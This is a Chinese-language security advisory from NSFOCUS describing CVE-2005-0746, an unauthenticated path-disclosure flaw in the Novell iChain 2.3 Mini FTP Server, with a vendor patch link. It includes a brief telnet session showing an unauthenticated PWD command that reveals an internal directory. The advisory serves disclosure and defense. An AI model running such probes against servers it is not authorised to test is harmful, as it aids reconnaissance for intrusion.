NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Novell iChain Mini FTP Server非授权远程路径泄漏漏洞

发布日期：2005-03-16
更新日期：2005-03-18

受影响系统：

Novell iChain 2.3

描述：

BUGTRAQ  ID: 12766
CVE(CAN) ID: CVE-2005-0746

Novell iChain是一款集成的安全解决方案，可以有效的控制对网络资源的访问。

Novell iChain Mini FTP Server允许未经认证就执行PWD命令，从而导致路径信息泄露。

详细信息：

famato@infobyte:~$ telnet 10.1.10.1
Connected to 10.1.10.1.
Escape character is '^]'.
220 Service Ready
PWD
257 "SYS:/ETC/PROXY/APPLIANCE/CONFIG/USER" is the current directory

但这个漏洞风险较低，因为iChain 23文档中已经记录了FTP目录。

<*来源：Francisco Amato （famato@infobyte.com.ar）

  链接：http://support.novell.com/cgi-bin/search/searchtid.cgi?/10096886.htm
        http://support.novell.com/cgi-bin/search/searchtid.cgi?/10096886.htm
*>

建议：

厂商补丁：

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.novell.com/cgi-bin/search/searchtid.cgi?/10096886.htm

浏览次数：3198
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客